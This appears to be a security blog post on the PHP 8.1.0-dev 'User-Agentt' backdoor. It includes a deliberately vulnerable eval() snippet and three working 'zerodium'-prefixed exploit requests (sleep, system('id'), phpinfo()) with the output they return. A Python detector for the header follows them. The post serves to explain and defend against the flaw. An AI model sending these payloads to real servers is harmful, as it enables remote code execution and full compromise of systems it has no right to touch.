ExploitQuest
PHP 8.1.0-dev RCE via User-Agentt Exploit



Introduction
In some versions of PHP 8.1.0-dev, a Remote Code Execution (RCE) vulnerability was discovered through a non-standard HTTP header called User-Agentt (note the doubled "t", unlike the normal User-Agent header). This vulnerability can be exploited if the application processes incoming headers without proper sanitization, allowing arbitrary system commands to be executed on the server.


How Does the Vulnerability Work?
The vulnerability occurs when the application uses $_SERVER['HTTP_USER_AGENTT'] unsafely, especially if the value is passed to functions like eval() or system().

If input validation is not implemented, attackers can execute unauthorized commands directly on the server.



Example of Vulnerable PHP Code

<?php
// Deliberately vulnerable: the raw header value is taken from the request and evaluated as PHP code
$user_agent = $_SERVER['HTTP_USER_AGENTT'];
eval($user_agent);
?>

Why is this dangerous?
Because an attacker can send an HTTP request with a User-Agentt header containing malicious PHP code, which will be executed directly on the server.

How to Exploit the Vulnerability



1. Testing Delay with sleep()

GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsleep(5);


If the response is delayed by 5 seconds, it confirms that the code is being executed successfully.

2. Executing a System Command with system()

GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsystem('id');


If the server responds with user information such as:

uid=33(www-data) gid=33(www-data) groups=33(www-data)


this means RCE exploitation is successful.


3. Executing PHP via phpinfo()

GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumphpinfo();



• This might display the current PHP configuration, which helps in understanding the target environment.
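For defenders, the three probes above share an easily recognisable signature: a User-Agentt header whose value begins with the "zerodium" marker. The following Python detector is an added example, not part of the original post; it parses raw HTTP/1.1 requests (the sample requests are constructed) and classifies each one so the check can be dropped into a log-review script or a request-inspection hook.

```python
from typing import Dict, List, Tuple

# Constructed sample requests (not captured traffic) mirroring the probes above,
# plus a benign request and one that carries the odd header name without the marker.
SAMPLE_REQUESTS = [
    "GET /index.php HTTP/1.1\r\nHost: vulnerable.com\r\nUser-Agentt: zerodiumsleep(5);\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: vulnerable.com\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: vulnerable.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: vulnerable.com\r\nuser-agentt: hello\r\n\r\n",
]

# The prefix that precedes the PHP code in the probes described on this page.
MARKER = "zerodium"


def parse_headers(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request into its request line and a lower-cased header map.
    Header names are case-insensitive, so 'User-Agentt' and 'user-agentt' are the same key."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # ignore malformed header lines rather than failing the scan
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def classify(raw: str) -> str:
    """'exploit' when the marker-prefixed payload is present, 'suspicious' when only the
    non-standard header name appears, otherwise 'clean'."""
    _, headers = parse_headers(raw)
    value = headers.get("user-agentt")
    if value is None:
        return "clean"
    if value.lower().startswith(MARKER):
        return "exploit"
    return "suspicious"


def scan(requests: List[str]) -> List[Tuple[str, str, str]]:
    """Return (verdict, request line, header value) for every request that is not clean."""
    findings = []
    for raw in requests:
        verdict = classify(raw)
        if verdict != "clean":
            request_line, headers = parse_headers(raw)
            findings.append((verdict, request_line, headers["user-agentt"]))
    return findings


if __name__ == "__main__":
    for verdict, request_line, value in scan(SAMPLE_REQUESTS):
        print(f"{verdict:<10} {request_line}  User-Agentt: {value}")
```

A request carrying the non-standard header name at all is worth alerting on, because legitimate clients have no reason to send it; the marker prefix then separates probing from noise such as typos in custom tooling.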



Conclusion
This vulnerability is extremely dangerous because it allows direct command execution on the server, potentially leading to a full compromise. Developers must be cautious about handling external inputs and always keep their PHP versions up to date.




#ExploitQuest

@ExploitQuest